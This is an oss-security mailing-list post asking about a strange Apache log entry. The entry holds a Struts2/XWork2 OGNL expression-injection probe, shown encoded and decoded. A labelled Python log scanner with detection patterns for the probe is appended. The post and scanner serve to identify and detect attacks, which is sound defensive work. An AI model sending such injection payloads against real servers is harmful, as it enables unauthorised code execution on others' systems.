Message-ID: <alpine.BSF.2.00.1410310520030.57132@aneurin.horsfall.org>
Date: Fri, 31 Oct 2014 05:30:46 +1100 (EST)
From: Dave Horsfall <dave@...sfall.org>
To: OSS Security <oss-security@...ts.openwall.com>
Subject: Some weird Apache redirection exploit?

May not be Apache-specific, but as it's the most popular server out 
there...

What is it trying to do?  I've never seen it in my logs before.

117.27.254.25 - - [31/Oct/2014:05:16:15 +1100] "GET ?redirect:${%23w%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23w.println('[/ok-helo.wang]'),%23w.flush(),%23w.close()} HTTP/1.1" 200 7543 "-" "Python-urllib/2.6"

The perp (or rather, the 0wn3d box) is somewhere in China.  When decoded, it
comes out as

GET ?redirect:${#w=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),#w.println('[/ok-helo.wang]'),#w.flush(),#w.close()}

but I'm none the wiser.

-- 
Dave Horsfall (VK2KFU)  "Bliss is a MacBook with a FreeBSD server."
http://www.horsfall.org/spam.html (and check the home page whilst you're there)
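
Added example, not part of the original post: a Python log check that percent-decodes the request target of each access-log line, as was done by hand above, and flags the markers visible in the decoded request. The indicator list, the function names and the second (benign) log line are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache combined log format; the request field is matched greedily because
# the logged target contains quotes and brackets a stricter pattern rejects.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>.*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Indicators taken from the decoded request in the post (assumed, not exhaustive).
INDICATORS = {
    "redirect-expression": re.compile(r"redirect:\$\{"),
    "context-access": re.compile(r"#context\b"),
    "xwork2-class": re.compile(r"com\.opensymphony\.xwork2\."),
}

def fully_decode(target, max_rounds=3):
    """Percent-decode repeatedly so nested encoding does not hide the markers."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def scan(lines):
    """Return one finding per log line whose decoded target hits an indicator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        parts = m["request"].split(" ")
        # Request is "METHOD target PROTOCOL"; the target is what lies between.
        target = " ".join(parts[1:-1]) if len(parts) >= 3 else m["request"]
        decoded = fully_decode(target)
        hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
        if hits:
            findings.append({"ip": m["ip"], "status": int(m["status"]),
                             "target": decoded, "indicators": hits})
    return findings

# First line is the one quoted in the post; the second is a constructed benign request.
SAMPLE_LOG = r"""
117.27.254.25 - - [31/Oct/2014:05:16:15 +1100] "GET ?redirect:${%23w%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23w.println('[/ok-helo.wang]'),%23w.flush(),%23w.close()} HTTP/1.1" 200 7543 "-" "Python-urllib/2.6"
192.0.2.10 - - [31/Oct/2014:05:17:02 +1100] "GET /login?redirect=/home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
""".strip().splitlines()

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The status code is carried into each finding because the access log alone does not show whether the marker string was written back in the response.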
